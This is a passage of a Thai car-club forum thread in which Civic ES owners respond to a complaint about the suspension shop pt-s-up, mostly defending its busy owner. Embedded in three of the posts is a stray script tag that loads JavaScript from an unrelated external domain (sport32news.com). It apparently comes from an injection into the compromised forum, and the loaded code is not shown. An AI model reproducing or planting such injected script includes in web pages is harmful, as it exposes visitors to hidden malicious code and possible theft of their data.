ได้รับคำขอบคุณจาก: mai  BOY_PeTiTe  Rangsit 33  hacker  kittidech  etabb  Winny  kaorjang  kunshybeer08  sukhothai  RG.KiD  carrimoroll  Tom-Acc 
cisco


ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
ศุกร์, 16 กรกฎา 2010 09:16 - เสียความรู้สึกกับร้าน pt-s-up จริง
ผมก็ตั้งวาวล์ที่นี่นะครับ ปกติดีทุกอย่าง

พี่งานเค้าเยอะนะครับ จะให้ดูแลคน ๆ เดียว คงยาก เพราะทุกคนคือลูกค้าไม่ใช่เหรอครับ

ถ้าคุณคิดว่าที่อื่นดีกว่าก็ไปที่อื่นเถอะครับ หาร้านที่คิดว่า Take Care คุณได้ จะได้สบายใจ

ผมไปที่ร้านนี้ลูกค้าเยอะจนไม่ได้ทำก็หลายครั้ง ผมก็คิดว่าไม่เป็นไร วันหลังมาใหม่ได้ รถมันขับได้อยู่นี่

ผมเลือกที่นี่เพราะสะดวกไม่ไกลบ้านมากนัก คุยกับพี่เค้าได้ทุกอย่าง แค่นี้ก็ OK แล้วครับ


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 16 กรกฎา 2010 09:17, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
aeae..


เข้าร่วม: 31 ธันวา 2008
ตอบ: 586

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 544
ให้คำขอบคุณ: 557

ที่อยู่: .........ณ นนท์.........
ปี: 2002
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 16 กรกฎา 2010 09:17 - เสียความรู้สึกกับร้าน pt-s-up จริง
เรื่องช่วงล่างต้องที่นี้เลยครับไม่มีที่ไหนที่เข้าใจช่วงล่าง ES เท่าร้านนี้ ส่วนเรื่องบริการ มาตรฐานของคนมันต่างกันในความคิดเห็นส่วนตัว พี่เขาไม่เห้นจะมีไรเลยการที่เขาไม่เข้ามาคุยหรือเทคแคร์คุณที่เป็นลูกค้าคนนึงไม่ได้แปลว่าเข้าไม่มี ลูกค้าสัมพันธ์อย่างที่คุณเจ้าของกระทู้ว่าเลยครับ ผมไปทำรถพี่เขาก้เดินมาถามแค่นั้นและเดี๋ยวพี่เขาก้จัดการให้ เรื่องเวลาก่อนที่ผมไปอู่พี่เขาก้ต้องโทรไปถามก่อนว่าวันนี้เอารถเข้าไปทำคิวเยอะไหมวันนี้เสร็จไหมพี่เขาก้จะบอกมาตรงว่าวันนี้ทันหรือไม่ทัน แต่เอาเป็นว่าโดยรวมผมรับได้กับการบริการและมาตรฐานผลงานที่ได้รับของอู่พี่ ลองเปิดใจรับฟังและหาแนวทางแก้ไขกันเถอะครับอย่าใช้อารมณ์ในการตัดสิน

ปล.ผมไม่มีการรู้จักพี่เขาเป็นการส่วนตัวน่ะครับเป็นแค่ลูกค้าคนนึงเท่านั้น (คนเล่นรถทุกคนรักรถของตัวเองทุกคนแหละครับ..ผมว่าทุกคนก็รักรถตัวเองมากไม่แพ้เจ้าของกระทู้หรอกครับ)


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 16 กรกฎา 2010 14:46, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
iMan


ชื่อเล่น: แมน

เข้าร่วม: 04 สิงหา 2008
ตอบ: 2838

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 12149
ให้คำขอบคุณ: 3080

ที่อยู่: Civic ES Group
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 16 กรกฎา 2010 09:22 - เสียความรู้สึกกับร้าน pt-s-up จริง
ผมอยู่รังสิตผมก็ไปเปลี่ยนแค่น้ำมันเครื่อง กับ ผ้าเบรค พี่เค้าก็เดินไปเดินมา ไม่ค่อยได้หยุดคุยเลย ทั้งหยิบอะไหร่ ลองรถ เลื่อนรถ ที่คุณบอกว่าไม่สนใจลูกค้าผมว่าไม่จริงหรอกครับ ร้านพี่เค้างานเยอะครับต้องเข้าใจ

สำหรับผมคิดว่าสำหรับคนรู้จักพี่เค้าบริการทีหลังซะด้วยซ้ำ กว่าจะได้กลับไม่เคยเห็น "แสงแดด" เลย...
"<script src="https://sport32news.com/civicesgroup.js">
TEE_MONO


ชื่อเล่น: ตี๋

เข้าร่วม: 30 พฤศจิกา 2009
ตอบ: 1050

ประธาน
ประธาน

ได้รับคำขอบคุณ: 2127
ให้คำขอบคุณ: 755

ที่อยู่: บางนา (จันทร์-ศุกร์) ชลบุรี (เสาร์-อาทิตย์)
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 16 กรกฎา 2010 09:29 - เสียความรู้สึกกับร้าน pt-s-up จริง
ได้รับคำขอบคุณจาก: BOY_PeTiTe  kittidech  mai  Winny  kaorjang  sukhothai  myoatty57 
PAE KUNG


ชื่อเล่น: เป้

เข้าร่วม: 08 ตุลา 2008
ตอบ: 1131

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2818
ให้คำขอบคุณ: 3696

ที่อยู่: Bangna&Bangbon
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 16 กรกฎา 2010 09:35 - เสียความรู้สึกกับร้าน pt-s-up จริง
เอาเป็นว่า คนอื่นเค้าพูดกันไปหมดแล้ว เพราะถึงยังไง ผมว่ากระทู้นี้ ไม่ได้ทำความเสียหายให้กับชื่อเสียงที่พี่ใหม่เค้ามีมาตั้งนานหรอก

ครับ ดีไม่ดียังไง ทุกคนในคลับล้วนรู้อยู่เต็มอก ส่วนผม ขอ HBD แทนล่ะกัน ขอให้พี่มี

ความสุขมากๆ ขอให้มีลูกค้า ''ดีๆ'' ลูกค้าเยอะๆ รวยๆครับพี่


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 16 กรกฎา 2010 09:41, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
Rangsit 33


เข้าร่วม: 01 ตุลา 2008
ตอบ: 2276

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3688
ให้คำขอบคุณ: 1582

ที่อยู่: Rangsit
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 กรกฎา 2010 09:39 - เสียความรู้สึกกับร้าน pt-s-up จริง
............ เซ็งแทนพี่ใหม่...........

............ เคยอ่านกระทู้คุณก่อนหน้านี้ ที่เป็นเรื่องส่วนตัวที่คุณมาระบาย...แล้วมาอ่านกระทู้นี้
............ คุณคิดอะไรมากไปรึเปล่าคับ ทำไม self-centered จังคับ

............ โพสระบายแบบนี้ ควรคิดดีๆก่อนครับ... เพราะป็นการทำให้ชาวบ้านเค้าเสียหาย

1. บุคลิกคนไม่เหมือนกัน... แต่ผมไม่เห็นว่าพี่เค้าเป็นอย่างที่คุณว่าเลย... คุณคาดหวังจะให้เค้าคุยกับคุณขนาดไหนคับ... อยากถามอะไร ก็เดินตามไปถามเลยก็ได้คับ...หมดเรื่อง... คุยง่าย สบายๆ

2. เรื่องวาล์วยัน... ตามป๋อง กะ เก็ท บอกคับ... ทีนี้เข้าใจยังคับ

3. เรื่องเวลารอ ที่ว่านาน... ตั้งวาล์วมันต้องรอให้เครื่องเย็นคับลูกพี่.... แล้วรอ 3 ชม กะ อู่พี่ใหม่... ไปตอนบ่ายโมง... คุณน่ะโชคดีสุดแล้ว... คุณโทรไป 0 Honda นะ... ที่ไหนก็ได้ แล้วบอกเค้าว่า จะเอารถไปตั้งวาล์ว... ไปเช้าเลยนะ 7-8 โมง...ต่อให้เป็นคิวแรกๆเลย คุณคิดว่าคุณจะได้รถกี่โมง???

4. รถเดิมเลยไม่สนใจ... ผมว่าพี่เค้าไม่คิดแบบนั้นหรอกคุณ... จะรถแต่ง รถเติม ทำมามันก็ได้ตังค์เท่ากันนิคับ... ไม่ใช่รถแต่งมี surcharge 5%.... จะบอกให้ว่ารถแต่งที่ท่านว่า บางคนสนิทกะพี่เค้า ไปก่อนได้ทำที่หลังด้วยซ้ำ ข้อหาสนิทกัน ทำให้คนอื่นก่อน


.............. พื้นที่นี้เปิดกว้างสำหรับทุกคน ทุกความคิดเห็นอยู่แล้ว... เข้าใจความรู้สึกนะ ว่ามันเป็นไง
.............. แต่คุณมองอะไรด้วยใจเป็นกลางแล้วรึยัง.... เป็นผมจะคิดให้ดีก่อน ก่อนที่จะพูดให้คนอื่นเสียหาย
.............. ถ้ามันเป็นที่คุณเข้าใจไปเอง หรือไม่รู้สาเหตุ ไม่ได้เข้าใจจริงๆ แล้วคุณจะรับผิดชอบด้วยอะไร... ผมอ่านแล้วมันไม่ได้มีสาระอะไรที่ทำให้ต้องเสียความรู้สึกขนาดนั้น.... นอกจากคิดไปเอง

.............. ถ้าเอาจากมาตรฐานที่คุณใช้อยู่..... ผมว่าพรุ่งนี้บอร์ดคงล่ม.... เพราะแมร่งคงโดนด่ากันแทบทุกร้าน... แม้กระทั่งร้านที่คุณไปทำมาที่ว่าดีก็เหอะ

.............. งั้นผมระบายบ้างได้ป่าว........... ร้านเปลี่ยนน้ำมันเครื่องแถวบ้านผมถามเค้าก็ไม่ค่อยคุยกับผม...แต่ผมกลับเขินเค้ามากกว่า...เออ นี่กูถามเค้าเยอะไปมั้ยเนี่ย คนเค้าจะทำงาน... ปล เพิ่งรู้ว่าในคลับมีเทพด้วยอะ ... ใครหรอคับ... จะได้ไปให้ดูดวงให้หน่อย ผมชอบดูดวง


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 16 กรกฎา 2010 10:27, ทั้งหมด 4 ครั้ง (ดูทั้งหมด)
crows


ชื่อเล่น: ชาติ

เข้าร่วม: 01 ตุลา 2008
ตอบ: 197

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 285
ให้คำขอบคุณ: 98

ที่อยู่: ฝั่งธนบุรี
ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 16 กรกฎา 2010 09:43 - เสียความรู้สึกกับร้าน pt-s-up จริง
ผมก็ได้ไปทำเลื่อนเป้ามานะครับ พี่เขาเข้ามาทักและถามความต้องการและอธิบายให้เข้าใจครับ
และแกก็สั่งลูกน้องและพี่แกด็หายไปเลย แต่ก็ประมาณ 2 ชั่วโมงครับจบเลย

ที่ที่แกหายไปนานผมยังคิดว่าพี่แกคงไม่แอบไปนวดแผนโบราณด้านหลังเลย
ได้รับคำขอบคุณจาก: hacker  mai  sayarm  PongpanG  jonatan  BOY_PeTiTe  Rangsit 33  8800Gold  zan  kittidech  sukhothai  etabb  Winny  kaorjang  kunshybeer08  honeybeex7  musashi44  K_series  carrimoroll  TUI_PeTiTe  Tom-Acc  aun99 
klaoies


ชื่อเล่น: เก้าอี้

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 241

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 348

ที่อยู่: nonthaburi
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 กรกฎา 2010 09:50 - เสียความรู้สึกกับร้าน pt-s-up จริง
เจ้าของ กระทู้ อย่า เคร่งเครียด มากเกินไปจิ -*-

สีหน้าออกหมดแล้ว (ดูจากรูป)
ได้รับคำขอบคุณจาก: Rangsit 33  hacker  mai  sayarm  PongpanG  jonatan  BOY_PeTiTe  8800Gold  zan  kittidech  sukhothai  Winny  kaorjang  kunshybeer08  honeybeex7  psYchosis  musashi44  K_series  carrimoroll  TUI_PeTiTe  Tom-Acc 
hacker


ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ที่อยู่: BKK <--> CNX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 กรกฎา 2010 09:58 - เสียความรู้สึกกับร้าน pt-s-up จริง
ผมเห็นกระทู้นี้เมื่อเช้าแระ ตอนหกโมง แต่รีบมาทำงานตอบไม่ทัน
เปิดใจให้กว้างคุยกันครับ ผมไม่ว่าฝ่ายไหน แต่อยากให้เห็นมุมมองของท่านอื่นๆบ้าง


ถ้าคุณเป็นผู้ประกอบการคุณจะมองอีกมุมหนึ่งได้ง่ายขึ้นและดีขึ้น
เป็นโปรแกรมเมอร์ก็น่าจะมีอัลกอริทึมในการทำงาน การโปรเซสงาน
รถที่จอดเปิดเครื่อง ต้องเข้าล็อกไหน อะไร อย่างไง ต้องคิดก่อนหมด
เพราะที่อู่ รถจอดทำได้ 6 คัน อันนี้เก็บไปคิดนะครับ (ง่ายๆ เหมือนเล่นเกมส์ถอยรถ)


เรื่องลูกค้าสัมพันธ์
ลูกค้าร้านมีมาก แล้วไหนจะโทรศัพท์ ไหนจะสั่งของ ไหนจะถอยรถจัดรถ แล้วก็ต้องออกไปลองรถ พี่แกทำเองหมดครับ
อันนี้ก็อาจจะมีตกมีหล่นกันบ้าง
แต่เท่าที่ผมเคยนั่งคุยมาก็น่าเห็นใจครับ
100 คน ถ้านั่งคุยหมดวันๆไม่ต้องทำอะไรครับ
ถามกลับนิดหนึ่งนะครับ อู่ที่พี่ไปทำ เจ้าของร้านเค้ามานั่งทำเองแบบที่กล่าวมาบ้างรึป่าว


คุณเข้าใจผิดเรื่องการทำรถแต่งแล้วละครับ
ไม่มีอู่ไหนอยากทำรถแต่งรายการหนักๆให้เปลืองที่จอดหรอกครับ
เจ้าของรถแต่งอะ รู้มาก เรื่องมาก เอาใจยาก จุกจิก สารพัดสารเพครับ


เท่าที่ผมสัมผัสมานะครับ
เข้าบ่าย 1 ออกบ่าย 4 ถือว่าคุณโชคดีมากครับ ร้านนี้ ถามหลายๆคนก็จะรู้เลย
ผมยกตัวอย่างเอาคนรู้จักก่อนนะครับ
บิค dc5 เคยออกจากบ้าน ตีห้ากว่าๆมาจองคิวทำรถครับ
พี่ป๋อง เคยทิ้งรถไว้ตั้งแต่ 11 โมง กลับมาเอา 3 ทุ่มครับ ตั้งวาล์วแบบคุณนี่แหละ
พี่เก็ท ใส่แค่คันเร่ง พักเท้า dc5 ไปบ่ายกว่าๆ กลับออกมา 3ทุ่ม โดยที่รถยังไม่ได้ทำด้วยครับ
สำหรับผม ไปเช้า ถึงเช้ามาก ออกอู่มาไม่เคยเร็วกว่า หกโมงเย็นซักครั้งเลยครับ ลูกค้าเยอะจริงๆ


เหตุผลอื่นๆผมว่าก็มีคนกล่าวไปเยอะแล้วละครับ ลองอ่านๆแล้วทบทวนดูหน่อยก็ได้ครับ


ขอโทษที่อ้างอิงบุคคลอื่นนะครับ
NeaT ES.


เข้าร่วม: 10 ตุลา 2008
ตอบ: 1247

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4530
ให้คำขอบคุณ: 1984

ที่อยู่: คนดีไม่มี
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 16 กรกฎา 2010 10:07 - เสียความรู้สึกกับร้าน pt-s-up จริง
----ผมไปทำโช๊คกับสปริงร้านพี่ใหม่ถึงร้าน 8โมงเช้า รถประมาณ15คัน ทำเสร็จ5โมงเย็น แต่ผมไม่รู้สึกเสียดายเลยเวลา9ชม.ที่ต้องต้องรอเลย ได้เห็นรถหลายๆคันเข้ามาทำนู่นทำนี้ก็เพลินๆดีครับได้รู้จักกับพี่ๆหลายๆคนก็จากร้านพี่ใหม่ ได้ความรู้เรื่องช่วงล่างหลายอย่างจากพี่ใหม่นะครับ

ปล1.----ลองเปิดใจดูใหม่นะครับแล้วมองอีกมุมนึงแล้วจะรู้ว่าไปร้านนี้ไม่ต่างอะกับไปมีตติ้ง...ฮ่าๆ <script src="https://sport32news.com/civicesgroup.js"></

ปล2.----เวลาพี่เค้าเหนื่อยเดียวเค้าก็มานั่งคุยด้วยเองอะคราบไม่ต้องไปคิดมากหรอก

ปล3.-----แล้วไม่ต้องคิดว่าคนใน board นี้จะเค้าข้างแต่พี่ใหม่นะครับ อะไรผิดถูกทุกคนรู้อยู่แก่ใจคับ


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 16 กรกฎา 2010 10:17, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
tun221


เข้าร่วม: 21 พฤษภาคม 2010
ตอบ: 239

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 370
ให้คำขอบคุณ: 170

ที่อยู่: ปากเกร็ด-ปทุม
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 กรกฎา 2010 10:09 - เสียความรู้สึกกับร้าน pt-s-up จริง
ผมยังไม่เคยไปให้พี่เขาเช็คเลย แต่มีคนแนะนำมาเหมือนกัน.. แต่ดูจากเสียงข้างมากแล้ว ผมคงไปแน่นอน..ประชาธิปไตยคัรบ
ได้รับคำขอบคุณจาก: hacker  iMan  PAE KUNG  sayarm  mai  PongpanG  jonatan  ValuEs  BOY_PeTiTe  Rangsit 33  8800Gold  zan  kittidech  chengg  Winny  kaorjang  kunshybeer08  honeybeex7  sukhothai  musashi44  K_series  carrimoroll  Tom-Acc  Justinaen 
~ สเตฟาน ~


ชื่อเล่น: สเตฟาน

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

ที่อยู่: รังสิต ประดิพัทธิ์
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 16 กรกฎา 2010 10:35 - เสียความรู้สึกกับร้าน pt-s-up จริง
ทุกคนในโลกใบนี้ ไม่มีใคร Perfect ไปซะทุกอย่าง...ไปซะทุกเรื่อง

เรื่องทุกอย่างจะง่ายขึ้น ถ้าหันหน้าคุยกัน

การให้โอกาสคน เป็นเรื่องที่ดี เหมือนอย่างที่ตัวเราเองก็ยังอยากได้รับโอกาส..จากคนอื่นเช่นกัน


ป.ล.1 ผมอยู่สะพานควาย เมื่อก่อนไปร้านพี่ใหม่ค่อนข้างบ่อย แต่ช่วงนี้ไม่ค่อยได้ไป กะว่าจะหาเวลาไปนั่งเล่นซะหน่อย อิ อิ

ป.ล.2 ผมโดนยิ่งกว่าคุณอีก ไม่อยากจะเหลา (เฮียใหม่เล่นผมซะจุกเลย)5 5 5 5 5
<script src="https://sport32news.com/civicesgroup.js"></


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 16 กรกฎา 2010 10:43, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
หน้า 1 จาก 9
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...